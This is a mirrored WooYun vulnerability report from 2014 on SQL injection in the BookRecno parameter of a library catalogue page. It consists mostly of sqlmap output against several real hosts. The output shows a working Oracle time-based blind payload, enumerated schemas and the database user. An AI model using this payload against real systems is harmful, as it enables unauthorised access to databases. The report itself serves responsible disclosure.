乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-08: 细节已通知厂商并且等待厂商处理中 2014-10-11: 厂商已经确认,细节仅向厂商公开 2014-10-14: 细节向第三方安全合作伙伴开放 2014-12-05: 细节向核心白帽子及相关领域专家公开 2014-12-15: 细节向普通白帽子公开 2014-12-25: 细节向实习白帽子公开 2015-01-06: 细节向公众公开
.........
............
http://211.69.140.40/NTRdrBookRetrInfo.aspx?BookRecno=66370available databases [19]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] ILAS[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDBhttp://202.96.165.98/NTRdrBookRetrInfo.aspx?BookRecno=225337Place: GETParameter: BookRecno Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: BookRecno=225337' AND 6659=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(88)||CHR(120)||CHR(101),5) AND 'XWdS'='XWdS---[06:53:18] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[06:53:18] [INFO] fetching current userhttp://ilas.helib.net/NTRdrBookRetrInfo.aspx?BookRecno=808475541available databases [19]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] ILAS[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDBhttp://210.45.204.9/NTRdrBookRetrInfo.aspx?BookRecno=45807web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[06:53:18] [INFO] fetching current user[06:53:18] [INFO] retrieved: [06:54:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[06:54:02] [ERROR] invalid character detected. retrying..[06:54:02] [WARNING] adjusting time delay to 6 secondsIL[06:55:42] [ERROR] invalid character detected. retrying..[06:55:42] [WARNING] adjusting time delay to 7 secondsAScurrent user: 'ILAS'[06:56:35] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[06:56:35] [INFO] fetching database (schema) names[06:56:35] [INFO] fetching number of databases[06:56:35] [INFO] retrieved:[06:56:42] [ERROR] unable to retrieve the number of databases[06:56:42] [INFO] falling back to current database[06:56:42] [INFO] fetching current database[06:56:42] [INFO] retrieved: ILASavailable databases [1]:[*] ILAShttp://218.28.6.78/NTRdrBookRetrInfo.aspx?BookRecno=1060available databases [13]:[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] ILAS[*] MDSYS[*] ORDSYS[*] OUTLN[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
..................
危害等级:高
漏洞Rank:14
确认时间:2014-10-11 17:54
暂无